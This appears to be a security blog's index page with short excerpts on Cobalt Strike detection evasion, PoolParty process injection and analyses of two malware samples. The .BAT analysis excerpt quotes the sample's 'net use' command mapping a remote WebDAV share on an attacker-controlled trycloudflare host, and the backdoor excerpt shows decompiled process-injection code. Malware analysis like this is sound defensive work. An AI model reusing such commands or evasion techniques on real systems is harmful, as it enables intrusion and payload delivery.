Advanced Techniques for Cobalt Strike Evasion and Detection Bypass

Advanced Techniques for Cobalt Strike Evasion and Detection Bypass Note: This is my first blog post in English, so I welcome any feedback on clarity or style. In this article I describe how we...

Jul 25, 2025 redteam, evasion

PoolParty Injection Learning Note

记录学习Poolparty注入技术的笔记 - 2025-5-21 poolparty，一种只需要在远程线程中分配和写入操作，而无需执行操作的注入技术，其核心是利用了windows的线程池作为攻击对象由于其并没有直接执行shellcode，所以大部分edr/av无法检测（当时，现在就不一定了） SafeBreach原文地址第一种注入技术复写workerfactory Startro...

May 21, 2025 security, injection

Windows Backdoor&Reflectiveloader Analysis

本样本来自卡饭论坛(Kafan) 样本行为&逆向命令行注入分支 v5 = strstr(GetCommandLineA(), "-proc "); if ( v5 ) { DWORD pid = sub_170122D18(v5 + 6); HANDLE h = OpenProcess(SYNCHRONIZE, FALSE, pid); W...

May 20, 2025 reverse, malware analysis

Windows .BAT Malware Analysis

本样本来自卡饭论坛(Kafan) 样本行为概述双击执行 .BAT 文件后，调用 net 组件加载远程共享磁盘： net use Z: "\\digital-childrens-junior-cure.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no ...

May 20, 2025 reverse, malware analysis

Personal Endpoint Protection Solution

目录引言威胁现状分析传统EPP/EDR的局限初步尝试 Elastic + SentinelOne 组合实践总结与展望引言有人可能认为，在当下的网络环境中，只要保持良好的上网习惯，甚至不装杀毒软件就足够了。但实际上，情况并非如此。如今的网络威胁与2000年左右病毒作者猖獗、特征明显的时代已经大不相同。现在的病毒更加隐蔽，威胁等级更高，越来越多...

May 20, 2025 security